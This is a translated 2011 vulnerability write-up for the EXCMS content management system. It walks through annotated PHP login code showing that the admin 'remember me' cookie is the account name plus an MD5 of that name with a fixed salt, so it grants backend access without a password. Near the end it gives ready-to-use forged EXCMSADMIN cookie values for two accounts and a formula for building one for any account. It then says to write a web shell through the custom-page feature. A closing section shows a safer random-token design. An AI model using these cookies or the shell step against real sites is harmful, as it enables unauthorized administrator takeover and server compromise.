Release date: 2011-01-18
Author: Mind
Affected version: unknown
Vendor: http://www.excms.cn/
Vulnerability type: cookie spoofing (admin login bypass)
Vulnerability description: a forged EXCMSADMIN cookie is enough to log straight into the admin backend; once inside, the custom-page function can be used to get a shell.
Backend login file: Admin/Modules/Auth/Index.php

<?php
if (!defined("EXCMS")) { exit("Access Denied"); }        // EXCMS is defined by admin/index.php, which sets the running mode
if (!defined("EXCMS_ADMIN")) { exit("Access Denied"); }
$excms_action['title'] = "Logon";                        // page title
$forward    = $_GET['forward'];                          // where to jump after login
$verifycode = $EXCMS_CONFIG['login_verifycode'];         // captcha setting
// ...
if ($_POST['loginType'] != 1 && !empty($_COOKIE['EXCMSADMIN']))   // look at this branch!
{
    $defaultBoxDisplay = "none";
    $BoxDisplay = "";
    $remeberInfo  = explode("&", $_COOKIE['EXCMSADMIN']);          // see this? magic tricks
    $remeberAdmin = $remeberInfo[0];                               // account name taken from the cookie
    $remeberPwd   = $remeberInfo[1];                               // "password" taken from the cookie; watch what happens with it
    // The salt is a fixed string in the source (a Chinese phrase, rendered here in translation).
    // Think about what this does to the security of the account.
    $pwdForever   = strtoupper(md5($remeberAdmin . "love EXCMS forever"));
    $remeberPwd   = ($remeberPwd == $pwdForever) ? true : false;
    $loginInputDispay = $remeberPwd ? "none" : "";
    $loginType        = $remeberPwd ? 3 : 2;
}
else
{
    $defaultBoxDisplay = "";
    $BoxDisplay = "none";
    $loginInputDispay = "none";
    $loginType = 1;
}
// what follows renders the login form
?>

Next, CheckLogin.php, the file that actually verifies the login. Look at the code:

<?php
if (!defined("EXCMS")) { exit("Access Denied"); }        // same guard as in Index.php
if (!defined("EXCMS_ADMIN")) { exit("Access Denied"); }
$excms_action['loadtpl'] = true;
$adminname   = trim($param['adminname']);
$password    = trim($param['loginType'] == 2 ? $param['password1'] : $param['password']);
$rememberPwd = $param['loginType'] == 2 ? $param['savePwd'] : $param['rememberPwd'];
$forward     = $param['forward'];
$login_fail  = true;
$error       = "";
// ignore the above; $param is built from POST
if (empty($adminname))                                   // account must not be empty
{
    $error = getlangbyname("EMPTY_ADMINNAME");
}
else if ($param['loginType'] != 3 && empty($password))   // password required unless loginType is 3
{
    $error = getlangbyname("EMPTY_PASSWORD");
}
else
{
    if ($param['loginType'] == 3)
    {
        // What follows is not a vulnerability introduced by mistake; ask any PHP expert to confirm.
        $remeberInfo  = explode("&", $_COOKIE['EXCMSADMIN']);
        $remeberAdmin = $remeberInfo[0];
        $remeberPwd   = $remeberInfo[1];                     // account and "password" taken from the cookie!
        $pwdForever   = strtoupper(md5($adminname . "love EXCMS forever"));
        if ($remeberPwd == $pwdForever)                      // the cookie "encryption" is even simpler than in ESPCMS
        {
            include_once(LIB_PATH . "system/Admin.class.php");
            $admin_obj = new Admin();
            $admin = $admin_obj->getByAdminname($adminname);  // tragedy: only the account name is looked up, no password is verified!
            if ($admin)
            {
                $admin['acl'] = $admin_obj->getAdminACL($admin['adminid']);
                $_SESSION['admininfo'] = $admin;             // administrator privilege obtained!
                ++$_SESSION['admininfo']['logintimes'];
                $admin_obj->updateLastLogin($admin['adminid']);
                include_once(LIB_PATH . "auth/Auth.class.php");
                $auth = new Auth();
                $auth->checkMenu(true);
                $excms_action['loadtpl'] = false;
                $login_fail = false;
            }
        }
    }
    else   // no cookie: this is the real login path, and note that it does verify the password
    {
        if ($EXCMS['config']['login_verifycode'])
        {
            $param['verifycode'] = trim($param['verifycode']);
            if ($param['verifycode'] == "")
            {
                $error = getlangbyname("EMPTY_VERIFYCODE");
            }
            else
            {
                include_once(LIB_PATH . "util/CheckCode.class.php");
                $checkcode = new CheckCode();
                if (!$checkcode->check($param['verifycode']))
                {
                    $error = getlangbyname("VERIFYCODE_FAILED");
                }
            }
        }
        if (empty($error))
        {
            include_once(LIB_PATH . "auth/Auth.class.php");
            $auth = new Auth();
            $loginMsg = $auth->Login($adminname, $password);
            if ($loginMsg['success'])
            {
                $_SESSION['admininfo'] = $loginMsg['admininfo'];
                ++$_SESSION['admininfo']['logintimes'];
                $auth->checkMenu(true);
                if ($rememberPwd == 1)
                {
                    // the cookie is name&MD5(name.salt): nothing in it depends on the password
                    $pwdForever = strtoupper(md5($adminname . "love EXCMS forever"));
                    setcookie("EXCMSADMIN", $adminname . "&" . $pwdForever, time() + 2592000);
                }
                else if ($param['loginType'] != 2 && $param['rememberMe'] == 1)
                {
                    setcookie("EXCMSADMIN", $adminname, time() + 2592000);
                }
                $login_fail = false;
                $excms_action['loadtpl'] = false;
            }
            else
            {
                $error = getlangbyname($loginMsg['message']);
            }
        }
    }
}
if (!$login_fail)
{
    if (empty($forward) || strpos($forward, "index.php?m=Auth"))
    {
        header("Location: index.php", true);
        exit();
    }
    header("Location: " . $forward, true);
    exit();
}
$errorCls = "f";
if ($excms_action['loadtpl'])
{
    if (!$error)
    {
        $error = getlangbyname("LOGIN_FAILED");
    }
    require(MODULES_PATH . "Auth/Index.php");
}
?>
// Analysis complete
Finally, the EXP (the %26 is a URL-encoded "&"):
EXCMSADMIN=admin%26858A611C5651AC436D4450CE23A858D1;
EXCMSADMIN=administrator%263E0331271F1133F9613BD49E7C4FB0CD;
The first value is for the account admin, the second for the account administrator. For any other account, construct the value yourself.
Construction method, matching the setcookie() call in CheckLogin.php (the salt is the Chinese string from the source, rendered here in translation):
setcookie("EXCMSADMIN", $account . "&" . strtoupper(md5($account . "love EXCMS forever")));
Set the cookie, go straight into the backend, then use the custom-page function to write a shell.
This cookie "vulnerability" is not a proper "remember admin login" feature at all: a remember-login cookie for the admin area should be verified against a server-side session id, not against a value that can be computed from the account name alone.
Therefore, this vulnerability is 100% a backdoor left by the developer!
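For contrast with the cookie check analysed above and the point about session-side verification, here is an added example (not EXCMS code) of a remember-me cookie that cannot be forged from the account name: the cookie carries a random selector plus a random secret, only a hash of the secret is stored server-side, and the lookup is bound to the admin id rather than to anything derived from the name. The $store array stands in for a database table and the function names are assumptions.

```php
<?php
// Added example, not part of EXCMS. $store stands in for a DB table keyed by selector.

function issue_remember_cookie(array &$store, int $adminid): string
{
    $selector  = bin2hex(random_bytes(8));     // public lookup key, no secret value
    $validator = bin2hex(random_bytes(32));    // the secret; stored only as a hash
    $store[$selector] = [
        'adminid' => $adminid,
        'hash'    => hash('sha256', $validator),
        'expires' => time() + 2592000,         // 30 days, the lifetime EXCMS uses
    ];
    return $selector . ':' . $validator;       // value to put in the cookie
}

function admin_from_remember_cookie(array &$store, string $cookie): ?int
{
    $parts = explode(':', $cookie, 2);
    if (count($parts) !== 2) { return null; }  // rejects "name&hash" style values outright
    [$selector, $validator] = $parts;
    if (!isset($store[$selector])) { return null; }
    $row = $store[$selector];
    if ($row['expires'] < time()) { unset($store[$selector]); return null; }
    // Constant-time compare of the hashed secret; the account name plays no part,
    // so knowing a username gives nothing to compute.
    if (!hash_equals($row['hash'], hash('sha256', $validator))) { return null; }
    unset($store[$selector]);                  // single use: a fresh token is issued on each login
    return $row['adminid'];
}

// Usage sketch: after a successful password login, adminid 1 is a constructed value.
$store  = [];
$cookie = issue_remember_cookie($store, 1);
setcookie('EXCMSADMIN', $cookie, time() + 2592000, '/', '', true, true);  // Secure + HttpOnly

// A forged EXCMS-style value is rejected; the genuine cookie resolves to the admin id once.
var_dump(admin_from_remember_cookie($store, 'admin&858A611C5651AC436D4450CE23A858D1'));  // NULL
var_dump(admin_from_remember_cookie($store, $cookie));   // int(1)
var_dump(admin_from_remember_cookie($store, $cookie));   // NULL (already consumed)
```

On the real login path the admin row would still be loaded by adminid and the session established only after this check, so the cookie proves possession of a server-issued secret rather than knowledge of a username.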